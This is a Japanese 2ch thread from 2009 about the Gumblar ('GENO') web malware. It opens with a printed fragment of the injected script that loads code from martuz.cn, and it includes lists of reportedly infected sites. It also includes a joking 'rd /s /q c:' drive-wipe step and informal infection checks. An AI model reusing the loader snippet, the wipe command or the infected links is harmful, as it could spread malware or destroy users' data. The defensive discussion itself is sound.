          j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列(詳しくはググれ)
     }
     document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね

698 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 00:03:06
>>680
違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。
102 ペチュニア(関西地方):2009/05/17(日) 19:54:25.64 ID:LnCZFSjE
なんか思いと思ったらこれか
でもAVG入れてるから問題ない
103 オキザリス・アデノフィラ(千葉県):2009/05/17(日) 19:54:29.85 ID:LcecAxeP
人間もPCもウイルスにかかってる
もう外も中もだめだ
104 オニタビラコ(岡山県):2009/05/17(日) 19:55:12.29 ID:oXWmrp4X
>>95
324も乗せろ
105 ツボスミレ(愛知県):2009/05/17(日) 19:55:26.42 ID:udK8d9qw
UAで弾いてるなら、UA偽装すれば安全って事?
誰か試してくれ
106 ショウジョウバカマ(三重県):2009/05/17(日) 19:56:10.97 ID:M5Qp0TJq
軟弱な豚インフルよりこっちのがよっぽど面白いな
107 ラッセルルピナス(東京都):2009/05/17(日) 19:56:09.22 ID:CiQAIduH
C:\WINDOWS → %WINDIR%
108 キュウリグサ(福岡県):2009/05/17(日) 19:56:36.84 ID:QQkT0wna
とりあえず踏んだ後だが

・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが動いてないか確認
・CPU使用率をチェック
・cmdでC:\WINDOWS\system32\sqlsodbc.chmが50,727か確認

・最後cmdからrd /s /q c:を実行


とこんな感じで試していくけど
他に何かある?
109 スズナ(東京都):2009/05/17(日) 19:56:49.33 ID:VZD8/13g
>>97
Chrome最新版っていわれてもな…StableとBetaとDevがあるんだが
110 サンシュ(長屋):2009/05/17(日) 19:57:00.85 ID:w2uGYIbu
vista 64bitって、最近じゃ使い勝手大丈夫かね?XPの64bit版よりかは格段って聞いてるけど。

7の64bitまで待とうかって思ってたけど、これねあるんじゃ繋ぎに買ってみようかな。
111 セントウソウ(長屋):2009/05/17(日) 19:57:05.91 ID:c5VF1Ttf
GENOウィルスの親玉にアパッチ打とうぜwwwwwwwwww
http://takeshima.2ch.net/test/read.cgi/news4vip/1242547793/
112 タニウズキ(神奈川県):2009/05/17(日) 19:57:10.36 ID:RddtXoK4
いろんなサイトのソース見てウイルス確認したけど、
成美堂出版ってどこにウイルスがあるの?
ソース見て確認したけどわからん
113 スズナ(dion軍):2009/05/17(日) 19:57:22.51 ID:TOTX2kWb
>>41
株式会社りぶメール(www.livmail.com/3others-page/janet/tokusen/index.htm)

未対策
114 キュウリグサ(福岡県):2009/05/17(日) 19:57:44.69 ID:QQkT0wna
>>109
通常最新版と言ったら
公式からダウンロードできるものじゃないの?
115 フデリンドウ(アラバマ州):2009/05/17(日) 19:57:44.81 ID:5GYYwEGs
>>104

324 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 22:24:31
>>221
>>1のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ

p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/
116 ミヤマヨメナ(東京都):2009/05/17(日) 19:57:50.35 ID:98DhjeJ/
うざい警告が初めて役に立ったって感じだvista
お前らざまあああああwwwwwww
117 スズナ(アラバマ州):2009/05/17(日) 19:58:12.45 ID:ABIJ2zfn
>>108
>最後cmdからrd /s /q c:を実行


これはやらなくていいだろw
遊ばないで検証を続けてくれ
118 フリージア(岩手県):2009/05/17(日) 19:58:15.54 ID:RI8YgeYO
で、サーバーにはどんな経路で侵入してるんだ?
OSの脆弱性?アプリケーションの脆弱性?
119 ヒヤシンス(神奈川県):2009/05/17(日) 19:58:36.19 ID:4IBC9DeW
感染してるサイトまとめってないの?誰か便利な〜リンク集みたいなの作ってくれ
120 ナズナ(埼玉県):2009/05/17(日) 19:58:38.81 ID:H1zPxW5H
>>108
・Acrobatが勝手に起動
これは?
121 桜(福岡県):2009/05/17(日) 19:58:41.66 ID:aKpz6ARH BE:371769942-2BP(2)

>>116
うんこ
122 ペチュニア(アラバマ州):2009/05/17(日) 19:58:48.29 ID:kILx2QCt
>>118
FTP
123 キュウリグサ(福岡県):2009/05/17(日) 19:58:57.63 ID:QQkT0wna
>>117
まぁどうせ消すからと思ってw
124 ガザニア(千葉県):2009/05/17(日) 19:59:10.39 ID:uHq4dfUe
セキュリティホールの戦犯は誰だよw

いまどきflash(笑)とかJavaScript(笑)使ったウェブサイトってwww
125 ツメクサ(北海道):2009/05/17(日) 19:59:13.17 ID:/y1olQuo
ウィルスがupdateするのはわかったんだが、それって悪意持った第三者がやってんの?
さすがに自己改善・自己進化できるウィルスは映画脳だよな…
126 レブンコザクラ(愛知県):2009/05/17(日) 19:59:48.27 ID:L36YVK/T
結局ふたば感染はガセだったの?
127 ポピー(福島県):2009/05/17(日) 20:00:19.23 ID:bUfWG8hO
戦犯(笑)
128 サトザクラ(チリ):2009/05/17(日) 20:00:55.10 ID:rDmPPqGI
>>124
アップデートしない情弱じゃないの?
129 フクシア(神奈川県):2009/05/17(日) 20:00:56.90 ID:cZ85gIrd
>>121
ちんこ
130 プリムラ・ヒルスタ(埼玉県):2009/05/17(日) 20:01:04.15 ID:W7zECwLz
セキュリティホールの戦犯?
わざわざダウングレードしてXP入れた奴だろ

ゲイツ万歳!
131 フリージア(岩手県):2009/05/17(日) 20:01:07.02 ID:RI8YgeYO
>>118
ん、つまりコンテンツアップロード者が感染してるってことか?
管理責任かよwww
132 桜(福岡県):2009/05/17(日) 20:01:33.25 ID:aKpz6ARH BE:371769942-2BP(2)

>>129
ま・・・ま・・・・
133 ポピー(コネチカット州):2009/05/17(日) 20:01:44.07 ID:aJmQW5CQ
同人サイトを攻撃するってことはこのウイルスって善玉菌?
134 フデリンドウ(アラバマ州):2009/05/17(日) 20:01:57.10 ID:5GYYwEGs
>>108
Gumblar ?とおもったら
ttp://www3.atword.jp/gnome/2000/01/14/gumblar-%EF%BC%9F%E3%81%A8%E3%81%8A%E3%82%82%E3%81%A3%E3%81%9F%E3%82%89/

>※注意:現在の最新のウィルスでは起動します。
最新のGENOウイルスはcmdは起動するとかいてあるけど
ほんとかどうか試して欲しい。
135 オキナグサ(福岡県):2009/05/17(日) 20:01:58.24 ID:Tw2s7Hys
同人板はホント情弱ばっかだな
136 スズナ(dion軍):2009/05/17(日) 20:02:27.44 ID:TOTX2kWb
137 セントランサス(福岡県):2009/05/17(日) 20:02:53.42 ID:8fJCqosV
これwindows updateじゃ防げないのがタチ悪い
138 オキザリス(東京都):2009/05/17(日) 20:03:04.11 ID:OT2LLMTM
>>118
PCに感染するとFTPとかのパケット監視をはじめて
そのPCがFTPなどに接続するとIDとパスワードを取得して他の感染PC達に通知。
そのIDとパスワードを使って、サイトにスクリプトを追加。
139 スズナ(東京都):2009/05/17(日) 20:03:09.22 ID:VZD8/13g
>>129
あんこ
140 ビオラ(東京都):2009/05/17(日) 20:03:17.89 ID:Oyq6gpkG BE:186899322-2BP(150)

141 サンシュ(東京都):2009/05/17(日) 20:03:46.82 ID:TVbfxF0n
>>132
おっぱい
142 キュウリグサ(福岡県):2009/05/17(日) 20:03:49.31 ID:QQkT0wna
>>120
おk

>>134
おk


◆現在の検証予定◆

○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが動いてないか確認
・CPU使用率をチェック
・cmdでC:\WINDOWS\system32\sqlsodbc.chmが50,727か確認
・Acrobatが勝手に起動
・最後cmdからrd /s /q c:を実行

○検証するブラウザ
IE6
IE7
IE8
Firefox Stable最新版
Opera Stable最新版
Chome Stable最新版
Safari Stable最新版
143 スズナ(dion軍):2009/05/17(日) 20:04:40.90 ID:TOTX2kWb
Googleの検索結果にGENO汚染されたサイトが入ってるだけでトロイが入ってこようとする。
とうとうGoogleも死亡か!?
144 ヤマエンゴサク(沖縄県):2009/05/17(日) 20:05:17.06 ID:WE9wrR2d
>>143
それ検索先の先読みが有効になってるだけでないの
145 ガザニア(大阪府):2009/05/17(日) 20:05:20.38 ID:MWvflWFs
ドラッグすると感染するからドラッグするなよ!絶対だぞ!!!

?????? ?????? ??????
146 スズナ(不明なsoftbank):2009/05/17(日) 20:05:50.69 ID:RiZu0qDk
情弱や一般人に感染するってのはポイント高いな
ごく一部に感染するキンタマや山田みたいな人生オワタ系ウイルスじゃなくて
サイト開いただけでウイルスに感染したらリカバリしなきゃやべぇ的なウイルス久しぶり杉ワロタ
147 レウイシア(大阪府):2009/05/17(日) 20:06:24.41 ID:BGymQwQM
>>143
それはブラウザの先読み機能だろうから設定変えたらいい
148 イワウチワ(大阪府):2009/05/17(日) 20:06:37.95 ID:j5QqoQFP
>>143
感染してないか?
このウイルスはグーグル先生の結果を改ざんするらしいぞ
149 スズナ(東京都):2009/05/17(日) 20:06:58.05 ID:h0tM9he7
GENOウィルス亜種が爆発的に増殖か小林製薬や同人サイト他中心に感染も5
http://takeshima.2ch.net/test/read.cgi/news4vip/1242545864/641

641 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/17(日) 20:05:15.34 ID:CXOV/Z770
http://www.dotup.org/uploda/www.dotup.org37789.jpg


carwash

150 キュウリグサ(福岡県):2009/05/17(日) 20:08:51.48 ID:QQkT0wna
>>142だが
検証するのは>>142だけでいい?
151 マツバウンラン(コネチカット州):2009/05/17(日) 20:09:18.72 ID:V8XDvPwP
結局要はアドビ更新すりゃいいんだよな?
152 サルトリイバラ(徳島県):2009/05/17(日) 20:09:19.87 ID:8meLDzTj
>>149
Avast!が超絶反応してワロタwwwww
153 パキスタキス(catv?):2009/05/17(日) 20:10:10.18 ID:H9i+P7OK
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
  http://www.btfree.info/file.php?action-get.html
  Code by: 790e3cc3feabad9
154 フデリンドウ(アラバマ州):2009/05/17(日) 20:10:24.98 ID:5GYYwEGs
>>150
とりあえず、その2つだけいいのではないでしょうか。
作業するのも大変でしょうし。
155 キュウリグサ(神奈川県):2009/05/17(日) 20:10:55.91 ID:7I7g4Il2
>>87
9.1.1じゃないと危ないらしいぞ
156 シラン(千葉県):2009/05/17(日) 20:11:09.77 ID:NL672/pA
先読み機能て何のためにあるのさ?
157 スズナ(滋賀県):2009/05/17(日) 20:11:45.55 ID:QKFBMuEO
>>156
ブラウジングの高速化・・・?
158 スズナ(東京都):2009/05/17(日) 20:11:54.22 ID:VZD8/13g
ちょっくらプリフェッチの切り方纏めてくるか
159 キュウリグサ(福岡県):2009/05/17(日) 20:12:09.87 ID:QQkT0wna
>>154
おk
じゃあ早速踏みまくってきますノシ
160 キブシ(東京都):2009/05/17(日) 20:12:13.99 ID:lkGVu3aj
>>149
スクリプトに反応しているのか
161 オダマキ(千葉県):2009/05/17(日) 20:12:22.20 ID:YFgNxRDj
>>149
キングソフトだと反応しなかった
162 コメツブツメクサ(東京都):2009/05/17(日) 20:12:51.94 ID:ImZyo4qx
このスレいい加減実態が見えて来ないな・・
163 桜(福岡県):2009/05/17(日) 20:13:04.07 ID:aKpz6ARH BE:1951790876-2BP(2)

>>157
なら、外付けHDDに世の中全てのキャッシュを保存すれば勝ち組だな
164 カラスビシャク(埼玉県):2009/05/17(日) 20:13:13.78 ID:4sYNvOMI
>>156
Firefoxの先読みは有効のままで何も問題ないぞ
165 サンシュ(東京都):2009/05/17(日) 20:14:56.23 ID:UuMvwAKM
         |:;:;:;:;:;:;:;:;:;:;:;:;:;:i;:;:;:;:;:;:;:;:;:;:;:;:;|
           |;:;:_:;:_:;:_:;:_;:;_:;:l:;_;:_:;:_:;:_:;:_;:_;|
        |______|_____|
        | 三|  _     _   |三 !
        | 三|  三シ   ヾ三  |三 |
        | 三′  .._ |||||  _,,..u i三 |   
        ト、ニ| <でiンヽ  ;'i"ィでiン |三.|
        ', iヽ!  、 ‐' /  !、 ーシ |シ,イ  
         i,ヽリ u  ,' :  !. u   |f ノ    
         ヾ!   ui ,、 ,..、ヽ__!_lノ
          |      _ _  ゙ー┬、`ヽ、
            l    ,ィチ‐-‐fー'⌒,ラー- ヽ
             ゙i、   ゝ、二フ,ニ二j ,-ヽ \   ___
              | \  ー一 ゙ー'7/ ハ  、  \_/ -ヽ
          ,ィ|、  \     /,二=-ヽ_ ゙、 ヽ^i-!:i
       _, イ  | ヽ_ 二=''" `ー--、  ` ゙、 丿 !:|
166 キショウブ(滋賀県):2009/05/17(日) 20:15:18.32 ID:RN0a72q8
Operaでやっといたほうがいい設定教えて
167 スズナ(大阪府):2009/05/17(日) 20:15:22.24 ID:KALCxZA/
この手のまとめサイトは無駄に冗長になっててわかりにくいよな。
>>151でいいと思うよ。
168 サンダーソニア(東京都):2009/05/17(日) 20:16:28.30 ID:Qtky1iiK
まとめサイト作る人はまとめるのが下手な法則
仕方ない
169 スズナ(神奈川県):2009/05/17(日) 20:16:33.68 ID:hU11AH+v
http://www.seibidoshuppan.co.jp       http://www.seibidoshuppan.co.jp
       http://www.seibidoshuppan.co.jp      http://www.seibidoshuppan.co.jp
  http://www.seibidoshuppan.co.jp  http://www.seibidoshuppan.co.jp 
 http://www.seibidoshuppan.co.jp        http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jp
    http://www.seibidoshuppan.co.jp      http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp   http://www.seibidoshuppan.co.jp
       http://www.seibidoshuppan.co.jp         http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp    http://www.seibidoshuppan.co.jp
  http://www.seibidoshuppan.co.jp             http://www.seibidoshuppan.co.jp
          http://www.seibidoshuppan.co.jp  http://www.seibidoshuppan.co.jp
 http://www.seibidoshuppan.co.jp  踏むな!!  http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp       http://www.seibidoshuppan.co.jp
       http://www.seibidoshuppan.co.jp      http://www.seibidoshuppan.co.jp
  http://www.seibidoshuppan.co.jp  http://www.seibidoshuppan.co.jp 
 http://www.seibidoshuppan.co.jp        http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jp
    http://www.seibidoshuppan.co.jp         http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp   http://www.seibidoshuppan.co.jp
       http://www.seibidoshuppan.co.jp         http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp    http://www.seibidoshuppan.co.jp
  http://www.seibidoshuppan.co.jp             http://www.seibidoshuppan.co.jp
          http://www.seibidoshuppan.co.jp  http://www.seibidoshuppan.co.jp
170 カラスビシャク(埼玉県):2009/05/17(日) 20:17:04.10 ID:4sYNvOMI
まとめwiki重すぎワロタ
同人の方は軽すぎワロタ
171 コバノランタナ(関東・甲信越):2009/05/17(日) 20:17:27.86 ID:MsetRKei
ニコニコ感染マダァ〜
172 ヒサカキ(長屋):2009/05/17(日) 20:17:28.26 ID:PpDa/RmV
いつも思うんだけど
ネットつなげていて、毎日アップデートしないやつって何なの?
173 スズナ(アラバマ州):2009/05/17(日) 20:18:25.33 ID:jJW7D3CE
xpsp3 IE8の実験用Pen4機で踏んでこようかな
174 キンギョソウ(長屋):2009/05/17(日) 20:18:49.12 ID:SHbVMyjf
標的がOfficeじゃなくてアクロバットってのがニクいよね
175 クマガイソウ(奈良県):2009/05/17(日) 20:19:42.14 ID:qcyU8BPc
666 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/17(日) 20:08:32.73 ID:9hjXkHlgO
ニコニコ動画見ていた→パソコン電源落ちる→再起動でブルスク


マジで助けて
176 シナノコザクラ(関東・甲信越):2009/05/17(日) 20:20:12.80 ID:wumN8ppo
もう発生してない国に逃げるしかない。
177 フデリンドウ(アラバマ州):2009/05/17(日) 20:20:23.80 ID:5GYYwEGs
>>159
それではお願いします。
あと、なにかリクエストが欲しいのならば
ttp://www3.atword.jp/gnome
の記事を参考にするとか
同人板の人たちにきくのが吉。
178 サトザクラ(チリ):2009/05/17(日) 20:20:28.60 ID:rDmPPqGI
>>172
俺みたいなめんどくさがりの低スペック使い
スタートアップとか、プロセスが少しでも多いと気になって仕方がない

いい加減PC買い換えたい・・・
179 ガザニア(大阪府):2009/05/17(日) 20:21:02.16 ID:MWvflWFs
このウィルスの報告で電源勝手に落ちるなんてあったか?
180 ユキノシタ(関東地方):2009/05/17(日) 20:21:19.47 ID:fLKMb4aM
>>179
無いと思う
181 アヤメ(神奈川県):2009/05/17(日) 20:21:55.43 ID:rG8cwPZp
>>178
3マソくらいで買えるだろOSはDSP版でいいじゃねえか。
182 ガザニア(大阪府):2009/05/17(日) 20:22:03.93 ID:MWvflWFs
ならハードが逝きかけてるだけじゃね
183 オオバコ(dion軍):2009/05/17(日) 20:22:12.25 ID:dEIbVjuu
多分過負荷で落ちたんだろ
184 セントウソウ(dion軍):2009/05/17(日) 20:22:55.52 ID:gHaqxyro
>>175
ニコニコも感染してんの?
185 ノミノフスマ(東京都):2009/05/17(日) 20:23:19.99 ID:LvrhtoYy
avast!は効果ありますか?
186 菜の花(宮城県):2009/05/17(日) 20:23:24.22 ID:FYSoDu6x
オミトロンってJavascriptはチェックできるの?
187 レブンコザクラ(和歌山県):2009/05/17(日) 20:23:29.59 ID:38AdChwb
>>169
一つだけ当たりのzipある
188 スズナ(東京都):2009/05/17(日) 20:23:39.03 ID:VZD8/13g
189 カラスビシャク(埼玉県):2009/05/17(日) 20:24:08.13 ID:4sYNvOMI
>>188
先読み切っても何の意味もねーよアホ
190 サンシュ(東京都):2009/05/17(日) 20:24:16.98 ID:TVbfxF0n
>>162
一応それっぽいウィルスが出回ってるのは事実みたいだな
ソースはマカフィ
191 キランソウ(関西地方):2009/05/17(日) 20:24:40.64 ID:WabS1jGS
使ってよかったfoxitReader
192 サトザクラ(チリ):2009/05/17(日) 20:24:43.55 ID:rDmPPqGI
>>181
すでに友人に金借りてる状況であらたに物買う気にならん。
今月分で完済予定だがな

ていうかたぶん高スペックになってもこの貧乏性は直んないと思う。
大学のときにオンボロメーカー製PC使ってたときに付いた癖だから
193 チチコグサ(dion軍):2009/05/17(日) 20:24:43.86 ID:/L1yHGmj
>>185
avastしか効果ありません
194 ショウジョウバカマ(三重県):2009/05/17(日) 20:24:59.08 ID:M5Qp0TJq
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/
195 タニウズキ(神奈川県):2009/05/17(日) 20:25:00.79 ID:RddtXoK4
まさかν速民にいまごろXPとかの情弱はいないよな
Vistaならノーガード余裕
ttp://ranobe.com/up/src/up360292.png
196 エニシダ(埼玉県):2009/05/17(日) 20:25:12.83 ID:VR+xQIpK
ぶっちゃけもう飽きてきた
197 プリムラ・ダリアリカ(山陽):2009/05/17(日) 20:25:38.64 ID:D3jJfuKz
FTPってなんだ?
198 オオニワゼキショウ(アラバマ州):2009/05/17(日) 20:25:41.69 ID:jAg50msa
どうしたらいいのか分からん
199 ツボスミレ(愛知県):2009/05/17(日) 20:25:55.01 ID:udK8d9qw
avast広めるのはいいけど
一応シャットダウンの不具合も書いておいた方がいいんじゃ?
後ライセンスキーの事も
200 キバナノアマナ(東京都):2009/05/17(日) 20:26:16.22 ID:Yz7qR1Rh
FoxitもScriptオフにしとけよ
201 シャクヤク(東京都):2009/05/17(日) 20:26:38.53 ID:l0juqGkS
どうやるのさ
202 ホトケノザ(コネチカット州):2009/05/17(日) 20:26:47.56 ID:s2pS2D1S
まとめが重すぎて同人まとめしか見れないんだけど、内容は同じ?

同人まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
203 ジンチョウゲ(東京都):2009/05/17(日) 20:26:54.25 ID:rjSzcPn7
>>191
Foxitでも設定でjava切っとけよ
204 サルトリイバラ(徳島県):2009/05/17(日) 20:27:04.07 ID:8meLDzTj
シャットダウンの不具合についてKWSK
205 水芭蕉(北海道):2009/05/17(日) 20:27:15.92 ID:rKFs3Epf
>>197 ファイル転送
206 アヤメ(神奈川県):2009/05/17(日) 20:27:18.90 ID:rG8cwPZp
>>184
接続関係だし、落ちることはあまりないかなあ。
過負荷かあったかくなってきたからPCの掃除不足かな。

>>188
現状ではChromeより、Ironのほうがよくね?
207 フデリンドウ(アラバマ州):2009/05/17(日) 20:27:20.11 ID:5GYYwEGs
>>173
よろしくお願いします。
208 ムラサキナズナ(大阪府):2009/05/17(日) 20:28:00.13 ID:q6tL+VSw
あれ?結局ニフとか言ってたのはガセだったの?
209 キランソウ(関西地方):2009/05/17(日) 20:28:11.94 ID:WabS1jGS
>>200
そだね、切っておくよ。
210 ノミノフスマ(東京都):2009/05/17(日) 20:28:24.88 ID:LvrhtoYy
なんか頭痛と鼻水が出てきた。
悪寒がするし、おなかも今朝から下痢っぽいし。
なんだろな…orz
211 タニウズキ(神奈川県):2009/05/17(日) 20:29:06.77 ID:RddtXoK4
成美堂出版は、トップページじゃなく、トップページからscript src=で呼び出してるjsファイルに
ウイルス埋め込まれてるのか
212 ユキノシタ(関東地方):2009/05/17(日) 20:29:07.88 ID:fLKMb4aM
ついにPC→ヒト間に変異したか・・・
213 スズナ(東京都):2009/05/17(日) 20:29:22.33 ID:VZD8/13g
>>210
お前もおしまいか
214 菜の花(宮城県):2009/05/17(日) 20:29:24.05 ID:FYSoDu6x
flashplayerとpdfreaderも自動アップデートさせてればこんなことにならんかった
明らかに市場独占してるadobeの怠慢
215 チチコグサ(アラバマ州):2009/05/17(日) 20:29:27.54 ID:00pmgETL
>>210
どう考えても豚GENOウィルス
216 サトザクラ(チリ):2009/05/17(日) 20:30:39.53 ID:rDmPPqGI
>>208
ニフはガセ、らしい


とりあえず各種アップデートやっといたから大丈夫だおる。たぶん
プロセスチェックだけはかかさずやっとこう
217 オウレン(山口県):2009/05/17(日) 20:30:41.74 ID:TbUW2CvG
>>212
やべーw
外でなくても死ぬ
218 レブンコザクラ(和歌山県):2009/05/17(日) 20:33:02.15 ID:38AdChwb
早くニコニコに感染させろ
219 チドリソウ(関東):2009/05/17(日) 20:33:11.63 ID:DyBbXwC5
空のゼロックスフォルダがあるんだが…
しかも削除できない…
220 キブシ(福岡県):2009/05/17(日) 20:33:34.40 ID:jz82hR6L
>>219
お わ っ た な
221 チチコグサ(関西・北陸):2009/05/17(日) 20:33:59.80 ID:dOCZTSgn
感染したらどうなんの
222 スズナ(アラバマ州):2009/05/17(日) 20:34:19.95 ID:jJW7D3CE
ゼロックスではなくてxeroxってかけよそこは
223 サトザクラ(チリ):2009/05/17(日) 20:35:06.91 ID:rDmPPqGI
ゼロックスって聞くとMtG思い出す。
224 チドリソウ(関東):2009/05/17(日) 20:35:37.75 ID:DyBbXwC5
どうすりゃいいのよ
PC知識ゼロの俺にはわからん
225 スズナ(滋賀県):2009/05/17(日) 20:35:59.84 ID:QKFBMuEO
>>224
放置をオススメする
226 オダマキ(千葉県):2009/05/17(日) 20:36:21.43 ID:YFgNxRDj
>>219
空なら大丈夫じゃね?
227 キブシ(埼玉県):2009/05/17(日) 20:36:39.74 ID:lXiNd5g5
UACって何かプログラム起動するとでてくるけどウイルスと何の関係があるんだ?
成美堂出版にアクセスしたらいきなりでてくるのか?
228 藤(千葉県):2009/05/17(日) 20:36:43.52 ID:jX9Tf4eo
>>224
それそのままでおk
229 レブンコザクラ(和歌山県):2009/05/17(日) 20:36:56.66 ID:38AdChwb
今回はタスクマネージャーのプロセスで「これがあったらアウト」ってのはないんだな
230 ガザニア(大阪府):2009/05/17(日) 20:37:00.64 ID:MWvflWFs
>>221
GENO感染時の症状

sqlsodbc.chmを改変
cmd.exe、regedit.exeが起動不能
一部のアンチウイルスソフトが更新不能
特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
Googleの検索結果を改竄(リンクを弄る)
explorer.exeや一部のブラウザが異常終了
Acrobatが勝手に起動
PDFファイルやシステムファイルが増殖
CPU、メモリ使用率がUP
再起動時にBSOD

らしい
231 スズナ(東京都):2009/05/17(日) 20:37:32.43 ID:yo6/k/EH
>>142
ttp://www.senlights.co.jp/seihin/kirenaru-1s.htm
昨日このサイトで感染させたんだけど
avastでJS:Redirector-H7 [Trj]が検出された
これがGENOウイルスかは不明

cmd.exeとregedit.exeは起動したしsqlsodbc.chmの書き換えもなし
http://www.dotup.org/uploda/www.dotup.org37897.jpg
232 ダリア(兵庫県):2009/05/17(日) 20:37:43.01 ID:kD3UsGfl
各セキュリティーベンダーの対応状況は?
233 プリムラ・ビオラケア(関西地方):2009/05/17(日) 20:37:49.03 ID:CGz5lqbx
>>210
それは恋だな
234 キュウリグサ(神奈川県):2009/05/17(日) 20:38:27.05 ID:7I7g4Il2
235 プリムラ・ヒルスタ(愛知県):2009/05/17(日) 20:38:37.07 ID:KUjlpCQD
>>233
どんだけ想ってんだよw
236 チドリソウ(関東):2009/05/17(日) 20:39:09.98 ID:DyBbXwC5
まあいいか
ノートンが対応するまで待とうっと
237 アブラチャン(神奈川県):2009/05/17(日) 20:39:48.20 ID:KrE+f874
>>134
感染したと思われるw2kでコマンドプロンプトは起動したな。regeditも
238 オキナワチドリ(大阪府):2009/05/17(日) 20:40:01.74 ID:JAWpB9ar
ノートンまだ対応してねーのかよ
夕方頃「ノートン対応ktkr」とか書き込んでる奴いたのに
239 ロベリア(山口県):2009/05/17(日) 20:40:15.48 ID:TPmQ3NS3
これってファイルをどうこうするウイルスじゃないみたいだから
最悪感染した後でも別システムで起動すればバックアップは取れるよね
240 スズナ(広島県):2009/05/17(日) 20:40:31.16 ID:N53/NzDO
ニフティがプロバイダごと感染して会員全滅ってスレ立ってるけどマジ?
241 ユキノシタ(dion軍):2009/05/17(日) 20:40:32.36 ID:yYveNWCW
>>236
300 192.168.0.774 [sage] 2009/05/17(日) 17:49:24 ID:6zykGUMd0
 martuz.cnノートンが対応
 ttps://safeweb.norton.com/report/show?name=martuz.cn
242 菜の花(宮城県):2009/05/17(日) 20:40:39.52 ID:FYSoDu6x
>>227
ウィルスコード実行するとPDFなんかがクラッシュしたあと、マルウェアがシステムドライブにアクセスしようとする。
UACオンにしてるとそこで止まる。

そもそもVistaだとウィルスコード実行されないけどね。
243 スズナ(滋賀県):2009/05/17(日) 20:40:55.98 ID:QKFBMuEO
>>240
ガセ
244 スズメノヤリ(千葉県):2009/05/17(日) 20:40:57.57 ID:C6+AO1yX
ZEROがきっちりと弾きました!
ってなるといいなあ
245 オランダミミナグサ(埼玉県):2009/05/17(日) 20:41:12.07 ID:Fv3WRAst
>>233
その理屈は変だろ
246 カタクリ(千葉県):2009/05/17(日) 20:41:47.50 ID:KLsPwtoF
>>244
きちんとTempフォルダにダウンロードしてから検査するから大丈夫
247 ナツグミ(長野県):2009/05/17(日) 20:42:00.91 ID:b1hK7AAL
AVGって弾きますか?
248 キュウリグサ(神奈川県):2009/05/17(日) 20:42:29.66 ID:7I7g4Il2
>>232
Avast! が検知するだけ。
対策はクリーンインストールのみ。
249 タチツボスミレ(静岡県):2009/05/17(日) 20:42:30.48 ID:OUWbXyvU
flashplayerってどうやってアップデートするんだろ
むしろflashplayerが入ってるのかどうかすらわからないんだが…
250 菜の花(宮城県):2009/05/17(日) 20:43:00.52 ID:FYSoDu6x
つーかマジAdobeに突撃した方がいいと思うんだが
251 ハナビシソウ(愛知県):2009/05/17(日) 20:43:07.28 ID:Qj6zykip
このウィルスで騒いでるのってニュー速だけ?
252 カタクリ(千葉県):2009/05/17(日) 20:43:18.00 ID:KLsPwtoF
>>249
